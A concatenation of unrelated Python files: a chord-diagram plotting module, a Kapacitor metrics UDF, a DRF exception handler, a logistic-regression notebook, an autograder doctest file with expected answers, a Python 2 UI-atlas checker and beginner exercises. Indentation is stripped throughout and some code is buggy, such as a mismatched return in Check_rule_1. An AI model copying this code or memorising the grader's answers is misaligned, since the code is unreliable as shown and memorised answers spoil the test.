pass
else:
print('module plot imported')
|
"""
Tools to draw a chord diagram in python
"""
from collections.abc import Sequence
import matplotlib.patches as patches
from matplotlib.colors import ColorConverter
from matplotlib.path import Path
import numpy as np
import scipy.sparse as ssp
from .gradient import gradient
from .utilities import _get_normed_line, dist, polar2xy
LW = 0.3
def chord_diagram(mat, names=None, order=None, width=0.1, pad=2., gap=0.03,
chordwidth=0.7, ax=None, colors=None, cmap=None, alpha=0.7,
use_gradient=False, chord_colors=None, show=False, **kwargs):
"""
Plot a chord diagram.
Parameters
----------
mat : square matrix
Flux data, mat[i, j] is the flux from i to j
names : list of str, optional (default: no names)
Names of the nodes that will be displayed (must be ordered as the
matrix entries).
order : list, optional (default: order of the matrix entries)
Order in which the arcs should be placed around the trigonometric
circle.
width : float, optional (default: 0.1)
Width/thickness of the ideogram arc.
pad : float, optional (default: 2)
Distance between two neighboring ideogram arcs. Unit: degree.
    gap : float, optional (default: 0.03)
        Distance between the arc and the beginning of the chord.
chordwidth : float, optional (default: 0.7)
Position of the control points for the chords, controlling their shape.
ax : matplotlib axis, optional (default: new axis)
Matplotlib axis where the plot should be drawn.
colors : list, optional (default: from `cmap`)
List of user defined colors or floats.
cmap : str or colormap object (default: viridis)
Colormap that will be used to color the arcs and chords by default.
See `chord_colors` to use different colors for chords.
alpha : float in [0, 1], optional (default: 0.7)
Opacity of the chord diagram.
use_gradient : bool, optional (default: False)
        Whether a gradient should be used so that chord extremities have the
same color as the arc they belong to.
chord_colors : str, or list of colors, optional (default: None)
Specify color(s) to fill the chords differently from the arcs.
        When the keyword is not used, chord colors default to the colormap given
by `colors`.
Possible values for `chord_colors` are:
* a single color (do not use an RGB tuple, use hex format instead),
e.g. "red" or "#ff0000"; all chords will have this color
* a list of colors, e.g. ``["red", "green", "blue"]``, one per node
(in this case, RGB tuples are accepted as entries to the list).
Each chord will get its color from its associated source node, or
from both nodes if `use_gradient` is True.
show : bool, optional (default: False)
Whether the plot should be displayed immediately via an automatic call
to `plt.show()`.
kwargs : keyword arguments
Available kwargs are:
================ ================== ===============================
Name Type Purpose and possible values
================ ================== ===============================
fontcolor str or list Color of the names
fontsize int Size of the font for names
rotate_names (list of) bool(s) Rotate names by 90°
sort str Either "size" or "distance"
zero_entry_size float Size of zero-weight reciprocal
================ ================== ===============================
"""
import matplotlib.pyplot as plt
if ax is None:
_, ax = plt.subplots()
# copy matrix and set a minimal value for visibility of zero fluxes
is_sparse = ssp.issparse(mat)
if is_sparse:
mat = mat.tocsr(copy=True)
else:
mat = np.array(mat, copy=True)
# mat[i, j]: i -> j
num_nodes = mat.shape[0]
# set entry size for zero entries that have a nonzero reciprocal
min_deg = kwargs.get("zero_entry_size", 0.5)
min_deg *= mat.sum() / (360 - num_nodes*pad)
if is_sparse:
nnz = mat.nonzero()
for i, j in zip(*nnz):
if mat[j, i] == 0:
mat[j, i] = min_deg
else:
zeros = np.argwhere(mat == 0)
for (i, j) in zeros:
if mat[j, i] != 0:
mat[i, j] = min_deg
# check name rotations
rotate_names = kwargs.get("rotate_names", False)
if isinstance(rotate_names, Sequence):
assert len(rotate_names) == num_nodes, \
"Wrong number of entries in 'rotate_names'."
else:
rotate_names = [rotate_names]*num_nodes
# check order
if order is not None:
mat = mat[order][:, order]
rotate_names = [rotate_names[i] for i in order]
if names is not None:
names = [names[i] for i in order]
if colors is not None:
colors = [colors[i] for i in order]
# sum over rows
x = mat.sum(axis=1).A1 if is_sparse else mat.sum(axis=1)
# configure colors
if colors is None:
colors = np.linspace(0, 1, num_nodes)
fontcolor = kwargs.get("fontcolor", "k")
if isinstance(fontcolor, str):
fontcolor = [fontcolor]*num_nodes
else:
assert len(fontcolor) == num_nodes, \
"One fontcolor per node is required."
if cmap is None:
cmap = "viridis"
if isinstance(colors, (list, tuple, np.ndarray)):
assert len(colors) == num_nodes, "One color per node is required."
# check color type
first_color = colors[0]
if isinstance(first_color, (int, float, np.integer)):
cm = plt.get_cmap(cmap)
colors = cm(colors)[:, :3]
else:
colors = [ColorConverter.to_rgb(c) for c in colors]
else:
raise ValueError("`colors` should be a list.")
if chord_colors is None:
chord_colors = colors
else:
try:
chord_colors = [ColorConverter.to_rgb(chord_colors)] * num_nodes
except ValueError:
assert len(chord_colors) == num_nodes, \
"If `chord_colors` is a list of colors, it should include " \
"one color per node (here {} colors).".format(num_nodes)
# find position for each start and end
y = x / np.sum(x).astype(float) * (360 - pad*len(x))
pos = {}
arc = []
nodePos = []
rotation = []
start = 0
# compute all values and optionally apply sort
for i in range(num_nodes):
end = start + y[i]
arc.append((start, end))
angle = 0.5*(start+end)
if -30 <= angle <= 180:
angle -= 90
rotation.append(False)
else:
angle -= 270
rotation.append(True)
nodePos.append(
tuple(polar2xy(1.05, 0.5*(start + end)*np.pi/180.)) + (angle,))
z = _get_normed_line(mat, i, x, start, end, is_sparse)
# sort chords
ids = None
if kwargs.get("sort", "size") == "size":
ids = np.argsort(z)
elif kwargs["sort"] == "distance":
remainder = 0 if num_nodes % 2 else -1
ids = list(range(i - int(0.5*num_nodes), i))[::-1]
ids += [i]
ids += list(range(i + int(0.5*num_nodes) + remainder, i, -1))
# put them back into [0, num_nodes[
ids = np.array(ids)
ids[ids < 0] += num_nodes
ids[ids >= num_nodes] -= num_nodes
else:
raise ValueError("Invalid `sort`: '{}'".format(kwargs["sort"]))
z0 = start
for j in ids:
pos[(i, j)] = (z0, z0 + z[j])
z0 += z[j]
start = end + pad
# plot
for i in range(len(x)):
color = colors[i]
# plot the arcs
start, end = arc[i]
ideogram_arc(start=start, end=end, radius=1.0, color=color,
width=width, alpha=alpha, ax=ax)
start, end = pos[(i, i)]
chord_color = chord_colors[i]
# plot self-chords
if mat[i, i] > 0:
self_chord_arc(start, end, radius=1 - width - gap,
chordwidth=0.7*chordwidth, color=chord_color,
alpha=alpha, ax=ax)
# plot all other chords
for j in range(i):
cend = chord_colors[j]
start1, end1 = pos[(i, j)]
start2, end2 = pos[(j, i)]
if mat[i, j] > 0 or mat[j, i] > 0:
chord_arc(
start1, end1, start2, end2, radius=1 - width - gap,
chordwidth=chordwidth, color=chord_color, cend=cend,
alpha=alpha, ax=ax, use_gradient=use_gradient)
# add names if necessary
if names is not None:
assert len(names) == num_nodes, "One name per node is required."
prop = {
"fontsize": kwargs.get("fontsize", 16*0.8),
"ha": "center",
"va": "center",
"rotation_mode": "anchor"
}
for i, (pos, name, r) in enumerate(zip(nodePos, names, rotation)):
rotate = rotate_names[i]
pp = prop.copy()
pp["color"] = fontcolor[i]
if rotate:
angle = np.average(arc[i])
rotate = 90
if 90 < angle < 180 or 270 < angle:
rotate = -90
if 90 < angle < 270:
pp["ha"] = "right"
else:
pp["ha"] = "left"
elif r:
pp["va"] = "top"
else:
pp["va"] = "bottom"
ax.text(pos[0], pos[1], name, rotation=pos[2] + rotate, **pp)
# configure axis
ax.set_xlim(-1.1, 1.1)
ax.set_ylim(-1.1, 1.1)
ax.set_aspect(1)
ax.axis('off')
plt.tight_layout()
if show:
plt.show()
return nodePos
# ------------ #
# Subfunctions #
# ------------ #
def initial_path(start, end, radius, width, factor=4/3):
''' First 16 vertices and 15 instructions are the same for everyone '''
if start > end:
start, end = end, start
start *= np.pi/180.
end *= np.pi/180.
# optimal distance to the control points
# https://stackoverflow.com/questions/1734745/
# how-to-create-circle-with-b%C3%A9zier-curves
    # use 16-vertex curves (4 cubic Bezier segments, which accounts for the worst-case
# scenario of 360 degrees)
inner = radius*(1-width)
opt = factor * np.tan((end-start)/ 16.) * radius
inter1 = start*(3./4.)+end*(1./4.)
inter2 = start*(2./4.)+end*(2./4.)
inter3 = start*(1./4.)+end*(3./4.)
verts = [
polar2xy(radius, start),
polar2xy(radius, start) + polar2xy(opt, start+0.5*np.pi),
polar2xy(radius, inter1) + polar2xy(opt, inter1-0.5*np.pi),
polar2xy(radius, inter1),
polar2xy(radius, inter1),
polar2xy(radius, inter1) + polar2xy(opt, inter1+0.5*np.pi),
polar2xy(radius, inter2) + polar2xy(opt, inter2-0.5*np.pi),
polar2xy(radius, inter2),
polar2xy(radius, inter2),
polar2xy(radius, inter2) + polar2xy(opt, inter2+0.5*np.pi),
polar2xy(radius, inter3) + polar2xy(opt, inter3-0.5*np.pi),
polar2xy(radius, inter3),
polar2xy(radius, inter3),
polar2xy(radius, inter3) + polar2xy(opt, inter3+0.5*np.pi),
polar2xy(radius, end) + polar2xy(opt, end-0.5*np.pi),
polar2xy(radius, end)
]
codes = [
Path.MOVETO,
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
Path.LINETO,
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
Path.LINETO,
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
Path.LINETO,
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
]
return start, end, verts, codes
def ideogram_arc(start, end, radius=1., width=0.2, color="r", alpha=0.7,
ax=None):
'''
Draw an arc symbolizing a region of the chord diagram.
Parameters
----------
start : float (degree in 0, 360)
Starting degree.
end : float (degree in 0, 360)
Final degree.
radius : float, optional (default: 1)
External radius of the arc.
width : float, optional (default: 0.2)
Width of the arc.
ax : matplotlib axis, optional (default: not plotted)
Axis on which the arc should be plotted.
color : valid matplotlib color, optional (default: "r")
Color of the arc.
Returns
-------
verts, codes : lists
Vertices and path instructions to draw the shape.
'''
start, end, verts, codes = initial_path(start, end, radius, width)
opt = 4./3. * np.tan((end-start)/ 16.) * radius
inner = radius*(1-width)
inter1 = start*(3./4.) + end*(1./4.)
inter2 = start*(2./4.) + end*(2./4.)
inter3 = start*(1./4.) + end*(3./4.)
verts += [
polar2xy(inner, end),
polar2xy(inner, end) + polar2xy(opt*(1-width), end-0.5*np.pi),
polar2xy(inner, inter3) + polar2xy(opt*(1-width), inter3+0.5*np.pi),
polar2xy(inner, inter3),
polar2xy(inner, inter3),
polar2xy(inner, inter3) + polar2xy(opt*(1-width), inter3-0.5*np.pi),
polar2xy(inner, inter2) + polar2xy(opt*(1-width), inter2+0.5*np.pi),
polar2xy(inner, inter2),
polar2xy(inner, inter2),
polar2xy(inner, inter2) + polar2xy(opt*(1-width), inter2-0.5*np.pi),
polar2xy(inner, inter1) + polar2xy(opt*(1-width), inter1+0.5*np.pi),
polar2xy(inner, inter1),
polar2xy(inner, inter1),
polar2xy(inner, inter1) + polar2xy(opt*(1-width), inter1-0.5*np.pi),
polar2xy(inner, start) + polar2xy(opt*(1-width), start+0.5*np.pi),
polar2xy(inner, start),
polar2xy(radius, start),
]
codes += [
Path.LINETO,
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
Path.LINETO,
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
Path.LINETO,
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
Path.LINETO,
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
Path.CLOSEPOLY,
]
if ax is not None:
path = Path(verts, codes)
patch = patches.PathPatch(path, facecolor=color, alpha=alpha,
edgecolor=color, lw=LW)
ax.add_patch(patch)
return verts, codes
def chord_arc(start1, end1, start2, end2, radius=1.0, pad=2, chordwidth=0.7,
ax=None, color="r", cend="r", alpha=0.7, use_gradient=False):
'''
Draw a chord between two regions (arcs) of the chord diagram.
Parameters
----------
start1 : float (degree in 0, 360)
Starting degree.
end1 : float (degree in 0, 360)
Final degree.
start2 : float (degree in 0, 360)
Starting degree.
end2 : float (degree in 0, 360)
Final degree.
radius : float, optional (default: 1)
External radius of the arc.
    chordwidth : float, optional (default: 0.7)
Width of the chord.
ax : matplotlib axis, optional (default: not plotted)
Axis on which the chord should be plotted.
color : valid matplotlib color, optional (default: "r")
Color of the chord or of its beginning if `use_gradient` is True.
cend : valid matplotlib color, optional (default: "r")
Color of the end of the chord if `use_gradient` is True.
alpha : float, optional (default: 0.7)
Opacity of the chord.
use_gradient : bool, optional (default: False)
        Whether a gradient should be used so that chord extremities have the
same color as the arc they belong to.
Returns
-------
verts, codes : lists
Vertices and path instructions to draw the shape.
'''
chordwidth2 = chordwidth
dtheta1 = min((start1 - end2) % 360, (end2 - start1) % 360)
dtheta2 = min((end1 - start2) % 360, (start2 - end1) % 360)
start1, end1, verts, codes = initial_path(start1, end1, radius, chordwidth)
start2, end2, verts2, _ = initial_path(start2, end2, radius, chordwidth)
chordwidth2 *= np.clip(0.4 + (dtheta1 - 2*pad) / (15*pad), 0.2, 1)
chordwidth *= np.clip(0.4 + (dtheta2 - 2*pad) / (15*pad), 0.2, 1)
rchord = radius * (1-chordwidth)
rchord2 = radius * (1-chordwidth2)
verts += [polar2xy(rchord, end1), polar2xy(rchord, start2)] + verts2
verts += [
polar2xy(rchord2, end2),
polar2xy(rchord2, start1),
polar2xy(radius, start1),
]
codes += [
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
Path.LINETO,
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
Path.LINETO,
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
Path.LINETO,
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
]
if ax is not None:
path = Path(verts, codes)
if use_gradient:
# find the start and end points of the gradient
points, min_angle = None, None
if dtheta1 < dtheta2:
points = [
polar2xy(radius, start1),
polar2xy(radius, end2),
]
min_angle = dtheta1
else:
points = [
polar2xy(radius, end1),
polar2xy(radius, start2),
]
                min_angle = dtheta2
# make the patch
patch = patches.PathPatch(path, facecolor="none",
edgecolor="none", lw=LW)
ax.add_patch(patch) # this is required to clip the gradient
# make the grid
x = y = np.linspace(-1, 1, 100)
meshgrid = np.meshgrid(x, y)
gradient(points[0], points[1], min_angle, color, cend, meshgrid,
patch, ax, alpha)
else:
patch = patches.PathPatch(path, facecolor=color, alpha=alpha,
edgecolor=color, lw=LW)
ax.add_patch(patch)
return verts, codes
def self_chord_arc(start, end, radius=1.0, chordwidth=0.7, ax=None,
color=(1,0,0), alpha=0.7):
start, end, verts, codes = initial_path(start, end, radius, chordwidth)
rchord = radius * (1 - chordwidth)
verts += [
polar2xy(rchord, end),
polar2xy(rchord, start),
polar2xy(radius, start),
]
codes += [
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
]
if ax is not None:
path = Path(verts, codes)
patch = patches.PathPatch(path, facecolor=color, alpha=alpha,
edgecolor=color, lw=LW)
ax.add_patch(patch)
return verts, codes
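# ------------------------- #
# Hedged usage sketch       #
# ------------------------- #
# Illustrative example only (not part of the original module): it builds a
# small random flux matrix and renders it with `chord_diagram`. The function
# name, node names and matrix values below are hypothetical.
def _example_chord_diagram(seed=0):
    import matplotlib.pyplot as plt
    rng = np.random.default_rng(seed)
    flux = rng.integers(1, 20, size=(4, 4))  # strictly positive, so every arc has weight
    names = ["A", "B", "C", "D"]
    chord_diagram(flux, names=names, alpha=0.8, use_gradient=False)
    plt.show()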
|
import sys
from kapacitor.udf.agent import Agent, Handler, Server
from kapacitor.udf import udf_pb2
import logging
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)s:%(name)s: %(message)s')
logger = logging.getLogger()
class GroupBuffer(object):
def __init__(self):
self._points = []
def append(self, point):
self._points.append(point)
def process(self, strip_prefix, drop_tags, ignore_values_from):
self._fields = {}
self._tags = {}
for entry in self._points:
entry_name = entry.tags['__name__']
if entry_name not in ignore_values_from:
if strip_prefix and entry_name.startswith(strip_prefix):
entry_name = entry_name[len(strip_prefix):]
self._fields[entry_name] = entry.fieldsDouble['value']
for tag,value in entry.tags.items():
if tag not in drop_tags:
self._tags[tag] = value
if not self._fields:
# There has to be at least one field in order for influxdb to accept the series.
self._fields = { 'unused_field': 1 }
class KubeStateMetricsJoinToSinglePoint(Handler):
class state(object):
def __init__(self):
self.time = None
self.group_buffers = {}
def update(self, point):
#print >> sys.stderr, ("POINT: %r" % point)
if not self.time:
self.time = point.time
group_buffer = self.group_buffers.get(point.group, GroupBuffer())
group_buffer.append(point)
self.group_buffers[point.group] = group_buffer
def process(self, *args, **kwargs):
for group_buffer in self.group_buffers.values():
group_buffer.process(*args, **kwargs)
def reset(self):
self.time = None
self.group_buffers.clear()
def __init__(self, agent):
self._agent = agent
self._strip_prefix = None
self._drop_tags = []
self._ignore_values_from = []
self._begin_response = None
self._state = KubeStateMetricsJoinToSinglePoint.state()
def info(self):
response = udf_pb2.Response()
response.info.wants = udf_pb2.STREAM
response.info.provides = udf_pb2.STREAM
response.info.options['stripPrefix'].valueTypes.append(udf_pb2.STRING)
response.info.options['dropTag'].valueTypes.append(udf_pb2.STRING)
response.info.options['ignoreValueFrom'].valueTypes.append(udf_pb2.STRING)
return response
def init(self, init_req):
success = True
msg = ''
for opt in init_req.options:
if opt.name == 'stripPrefix':
self._strip_prefix = opt.values[0].stringValue
elif opt.name == 'dropTag':
self._drop_tags.append(opt.values[0].stringValue)
elif opt.name == 'ignoreValueFrom':
self._ignore_values_from.append(opt.values[0].stringValue)
response = udf_pb2.Response()
response.init.success = success
response.init.error = msg[1:]
return response
def snapshot(self):
response = udf_pb2.Response()
response.snapshot.snapshot = ''
return response
def restore(self, restore_req):
response = udf_pb2.Response()
response.restore.success = False
response.restore.error = 'not implemented'
return response
def begin_batch(self, begin_req):
raise Exception("not supported")
def end_batch(self, end_req):
raise Exception("not supported")
def flush(self):
self._state.process(self._strip_prefix, self._drop_tags, self._ignore_values_from)
for group_id, group_buffer in self._state.group_buffers.items():
response = udf_pb2.Response()
response.point.group = group_id
response.point.time = self._state.time
for tag,value in group_buffer._tags.items():
response.point.tags[tag] = value
for field,value in group_buffer._fields.items():
response.point.fieldsDouble[field] = value
self._agent.write_response(response)
self._state.reset()
def point(self, point):
# Points come through in bursts, all from a particular scrape share the same time.
# So once the time changes, we can flush the current cache.
if self._state.time and self._state.time != point.time:
self.flush()
# Add point to cache.
self._state.update(point)
if __name__ == '__main__':
agent = Agent()
handler = KubeStateMetricsJoinToSinglePoint(agent)
agent.handler = handler
logger.info("Starting agent")
agent.start()
agent.wait()
logger.info("Agent finished")
|
from rest_framework import status
from rest_framework.exceptions import ValidationError
from rest_framework.views import exception_handler
def custom_exception_handler(exc, context):
if isinstance(exc, ValidationError) and any(
'unique' in err_codes for err_codes in exc.get_codes().values()):
exc.status_code = status.HTTP_409_CONFLICT
return exception_handler(exc, context)
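# Hedged usage note (illustrative, not part of the original module): DRF is
# pointed at a custom handler via the EXCEPTION_HANDLER setting; the dotted
# path below is hypothetical and must match wherever this module lives.
#
#     REST_FRAMEWORK = {
#         'EXCEPTION_HANDLER': 'myproject.utils.custom_exception_handler',
#     }
#
# With that in place, validation errors whose error codes include 'unique'
# are returned as 409 Conflict instead of the default 400 Bad Request.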
|
# -*- coding: utf-8 -*-
"""Logistic_Regression ML.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1lMtFkIGC4EIQ5UNVEs1ob-zUOBImv7fs
"""
import pandas as pd
df = pd.read_csv("/content/drive/MyDrive/Social_Network_Ads.csv")
df
x = df.iloc[:,2:4].values
y = df.iloc[:,4].values
x
y
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
from sklearn.model_selection import train_test_split
x_train,x_test,y_train,y_test = train_test_split(x,y, test_size = 0.25, random_state=0)
x_train = sc.fit_transform(x_train)
x_test = sc.transform(x_test)  # reuse the scaler fitted on the training set (avoids test-set leakage)
x_test
from sklearn.linear_model import LogisticRegression
log = LogisticRegression(random_state=0)
log.fit(x_train,y_train)
pred_y = log.predict(x_test)
pred_y
y_test
from sklearn import metrics
metrics.accuracy_score(y_test,pred_y)
metrics.confusion_matrix(y_test,pred_y)
log.predict(sc.transform([[32,70000]]))
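# Hedged extra step (not in the original notebook): a per-class summary is
# often easier to read than a raw confusion matrix.
from sklearn.metrics import classification_report
print(classification_report(y_test, pred_y))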
|
test = {
'name': 'Question',
'points': 1,
'suites': [
{
'cases': [
{
'code': r"""
>>> list2
[7, 14, 21, 28, 35, 42, 49]
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> list_divisible(5, 19, 2)
[6, 8, 10, 12, 14, 16, 18]
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> list_divisible(5, 56, 7)
[7, 14, 21, 28, 35, 42, 49]
""",
'hidden': False,
'locked': False
}
],
'scored': True,
'setup': '',
'teardown': '',
'type': 'doctest'
}
]
}
|
def trigger_breakpoint(owner=None):
pass
|
#coding=gb18030
'''
Copyright(c) Funova
FileName : UIOptimizeChecker.py
Creator : pengpeng
Date : 2014-12-25 11:11
Comment :
ModifyHistory :
'''
__version__ = '1.0.0.0'
__author__ = 'pengpeng'
import os
import sys
import re
import string
import csv
import argparse
# import yaml
# from PIL import Image
import Image
g_TestSuite = r"UIOptimizeChecker"
g_RootPath = r"E:\WorkSpace\gunsoul_mobile\game\project\game-xx"
g_UIPath = r"E:\WorkSpace\gunsoul_mobile\game\project\game-xx\Assets\resourcex\ui\altas"
g_TabFile = r"UIMetaCheckerConfig.tab"
g_LogTab = r"logs\UIMetaCheckerLog.tab"
g_LogFile = r"logs\UIOptimizeChecker.log"
g_JUnitLog = r"logs\UIOptimizeChecker.xml"
def FindFiles(dir, out, filter):
if not os.path.exists(dir):
print "path not exists."
return
listdir = os.listdir(dir)
for file in listdir:
filename = os.path.join(dir, file)
if os.path.isfile(filename):
ext = os.path.splitext(filename)[1]
# print ext
if ext.lower() in filter or ext == '':
# print filename
out.append(filename)
elif os.path.isdir(filename):
if file == ".svn":
continue
out = FindFiles(filename, out, filter)
return out
def ReadTabFile(filepath):
reader = csv.reader(open(filepath, "r"), delimiter="\t")
i = 0
res = []
for row in reader:
i = i + 1
if i > 1:
res.append(row[0])
return res
pass
def Analysis(file_path, keys_prefix, keys_postfix):
"""Extract the path from the give file.
Return a set.
"""
fileobj = file(file_path, "r")
filecontent = fileobj.read() # read the content, this is also for lua special
fileobj.close()
outset = set()
regx = re.compile(r"(%s[/|\\].+?\.(%s))" % (keys_prefix, keys_postfix), re.I)
results = re.findall(regx, filecontent)
for result in results:
if len(result) > 0:
if "\t" not in result[0]:
afterformat = string.replace(result[0], "\\\\", "\\")
afterformat = string.replace(afterformat, "/", "\\")
outset.add(afterformat)
return outset
def Check_rule_1(i, f_png, rules = ""):
"""Check the rule of meta file is valid or not.
Return a bool: True -> no error, or otherwise.
"""
bRet = True
szName = ("Path: %s \n") % (f_png[len(g_RootPath)+1:])
szMsg = ""
szJMsg = ""
logresult = []
JUnitResult = {}
if not os.path.exists(f_png):
bRet = False
szMsg = ("%s: %s") % (szName, " -- not exists.")
szJMsg = ('''
<testcase classname="%s" caseId="%s" result="%s" name="%s">
<failure type="Error">
</failure>
</testcase>
''') % (i, i, bRet, szName)
return bRet, szMsg, szJMsg
else:
# 1. Get the size of the png
img = Image.open(f_png)
# print f[:-4] + keys_postfix
# print img.size
area = img.size[0] * img.size[1]
# 2. Get the size of the sub in the pefab png.
f_prefab = f_png[:-4] + keys_postfix
if os.path.exists(f_prefab):
png_subs = []
fileobj = file(f_prefab, "r")
lines = fileobj.readlines()
fileobj.close()
# index = 0
# prepare regx
regx1 = re.compile(r"name: (\w+)")
regx2 = re.compile(r"width: (\d+)")
regx3 = re.compile(r"height: (\d+)")
# for line in lines:
for index in xrange(0,len(lines) - 1):
# print lines[index]
results = re.findall(regx1, lines[index])
if results and len(results) > 0:
# print results[0]
# index = index + 3
if lines[index + 3] and lines[index + 4]:
results2 = re.findall(regx2, lines[index + 3])
results3 = re.findall(regx3, lines[index + 4])
if (results2 and len(results2) > 0) and (results3 and len(results3) > 0):
# print results2[0]
width = int(results2[0])
height = int(results3[0])
area_t = width * height
png_subs.append(area_t)
# index = index + 1
sub_area = 0
for item in png_subs:
sub_area = sub_area + item
# print area, sub_area
ratio = float(sub_area) / float(area)
logresult = [f_png[len(g_RootPath)+1:], area, sub_area, ratio]
# print ratio
if 1.00 > ratio > 0.85:
bRet = True
szMsg = "Thie png file no need to be optimized."
szJMsg = ('''
<testcase classname="%s" caseId="%s" result="%s" name="%s"/>
''') % (i, i, "Passed", szName)
pass
else:
bRet = False
szMsg = "Thie png file need to be optimized. Total area(%s), Actual area(%s), Ratio(%.2f%%)." % (area, sub_area, ratio * 100)
szJMsg = ('''
<testcase classname="%s" caseId="%s" result="%s" name="%s">
<failure type="Error">
%s
</failure>
</testcase>
''') % (i, i, "Failed", szName + szMsg, szMsg)
return bRet, szMsg, szJMsg, logresult
pass
if __name__ == "__main__":
import time
print("begin at: %s" % (time.strftime('%Y-%m-%d -- %H:%M:%S',time.localtime(time.time()))))
startTime = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))
parser = argparse.ArgumentParser()
parser.add_argument('-r')
parser.add_argument('-d')
parser.print_help()
args = parser.parse_known_args()[0]
if args.d:
g_RootPath = args.r
g_UIPath = args.d
print g_UIPath
bResult = True
szResMsg = ""
szJUnitMsg = ""
nTotalFailedCount = 0
str1 = ""
keys_postfix = ".prefab"
logfileobj = open(g_LogFile, "w")
junitfileobj = open(g_JUnitLog, "w")
logtabobj = open(g_LogTab, "w")
logresult = []
files = []
files = FindFiles(g_UIPath, files, [".png"])
if files:
i = 0
for f in files:
i = i + 1
bRet, szMsg, szJMsg, temp = Check_rule_1(i, f)
if not bRet:
bResult = False
szResMsg = szResMsg + szMsg
szJUnitMsg = szJUnitMsg + szJMsg
logresult.append(temp)
else:
szJUnitMsg = szJUnitMsg + szJMsg
# if bResult:
# # print "Success."
# str1 = "Passed"
# else:
# # print szResMsg
# str1 = "Failed"
# Test
# i = 0
# f1 = r"E:\workspace\gunsoul_mobile\game\project\game-xx\Assets\resourcex\ui\altas\beibao\nxbeibao.png"
# f2 = r"E:\workspace\gunsoul_mobile\game\project\game-xx\Assets\resourcex\ui\altas\beibao\nxbeibao.prefab"
# Check_rule_1(i, f1, f2)
# logfileobj.write(szResMsg)
# logfileobj.close()
# logtabobj
logtabobj.write("filename\tarea\t(KB)\tsub_area\t(KB)\tratio\n")
for item in logresult:
print item
logtabobj.write("%s\t%s\t%s\t%s\t%s\t%.2f%%\n" % (item[0], item[1], item[1] / 1024, item[2], item[2] / 1024, item[3] * 100))
logtabobj.close()
endTime = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))
junitfileobj.write(r'<?xml version="1.0" encoding="utf-8"?>')
junitfileobj.write(r'<testsuite classname="%s" name="%s" result="%s" startTime="%s" endTime="%s" errorInfo="">'
% ("Resource Check", g_TestSuite, str1, startTime, endTime))
junitfileobj.write(r'<testsuite>')
junitfileobj.write(szJUnitMsg)
junitfileobj.write(r'</testsuite>')
junitfileobj.write(r'</testsuite>')
junitfileobj.close()
else:
print "path is None."
print("end at: %s" % (time.strftime('%Y-%m-%d -- %H:%M:%S', time.localtime(time.time()))))
|
# Python practice exercises
# Course: Automate the Boring Stuff with Python
# Developer: Valeriy B.
# Intro
# Password check
def password():
passwordFile = open('practice/secretPasswordFile.txt')
secretPassword = passwordFile.read()
    yourPassword = input("Type the password: ")
if yourPassword == secretPassword:
print("Access granted")
if yourPassword == "12345":
print ("That password is not good at all")
else:
print("Access denied")
# Dictionaries and structuring data
# Character count
def character_count(st):
    count = {}
    # My method
    for c in st:
        count[c] = st.count(c)
    return count
# Other method (moved out of character_count because the early return above
# made it unreachable inside the original function)
def character_count_setdefault(st):
    count = {}
    for character in st:
        count.setdefault(character, 0)
        count[character] = count[character] + 1
    print(count)
# Pretty character count
import pprint
def pretty_character_count(st):
count = {}
for c in st:
count[c] = st.count(c)
return pprint.pformat(count)
message = "It was a bright cold day in April, and the clocks were striking thirteen."
# Tic-Tac-Toe Board
def tic_tac_toe_board():
# Game board dictionary
the_board = {
"top_l": " ", "top_m": " ", "top_r": " ",
"mid_l": " ", "mid_m": " ", "mid_r": " ",
"bot_l": " ", "bot_m": " ", "bot_r": " "
}
# Printing game board
def game_board(board):
print(board["top_l"] + "|" + board["top_m"] + "|" + board["top_r"])
print("------------")
print(board["mid_l"] + "|" + board["mid_m"] + "|" + board["mid_r"])
print("------------")
print(board["bot_l"] + "|" + board["bot_m"] + "|" + board["bot_r"])
print("------------")
game_board(the_board)
board_space = ""
player = ""
count = 1
# Looping for the 9 times
while count != 10:
# Stop the game if user input is 'q'
if board_space == "q":
break
# Selecting the player 'X' or 'O'
if count % 2 == 0:
board_space = input("Player 'O' - Choose a space on the board: ")
player = "O"
else:
board_space = input("PLayer 'X' - Choose a space on the board: ")
player = "X"
# Verifying if user input space is in the board dictionary
if board_space in the_board:
# Verifying if the board spot is not already taken
if the_board[board_space] == " ":
the_board[board_space] = player
count += 1
game_board(the_board)
else:
print("This space is already taken")
else:
print("Input space could not be found")
# Manipulating strings
# Picnic Table
def printPicnic(itemDict, leftWidth, rightWidth):
print("PICNIC ITEMS".center(leftWidth + rightWidth, "-"))
for k, v in itemDict.items():
print(k.ljust(leftWidth, ".") + str(v).rjust(rightWidth))
picnicItems = {"sandwiches": 4, "apples": 12, "cups": 4, "cookies": 8000}
# Regular expressions
def isPhoneNumber(text):
    result = 0
    # Guard against malformed input before indexing into the split pieces.
    if len(text) != 12 or text.count("-") != 2:
        return "It is not a phone number"
if text.split("-")[0].isdigit() and len(text.split("-")[0]) == 3:
result += 1
if text.split("-")[1].isdigit() and len(text.split("-")[1]) == 3:
result += 1
if text.split("-")[2].isdigit() and len(text.split("-")[2]) == 4:
result += 1
if text[3] == "-" and text[7] == "-":
result += 1
if len(text) == 12:
result += 1
if result == 5:
return "It is a phone number"
else:
return "It is not a phone number"
|
"""
@author - Anirudh Sharma
"""
def romanToInt(s: str) -> int:
# Dictionary of roman numerals
roman_map = {'I': 1, 'V': 5, 'X': 10, 'L': 50, 'C': 100, 'D': 500, 'M': 1000}
# Length of the given string
n = len(s)
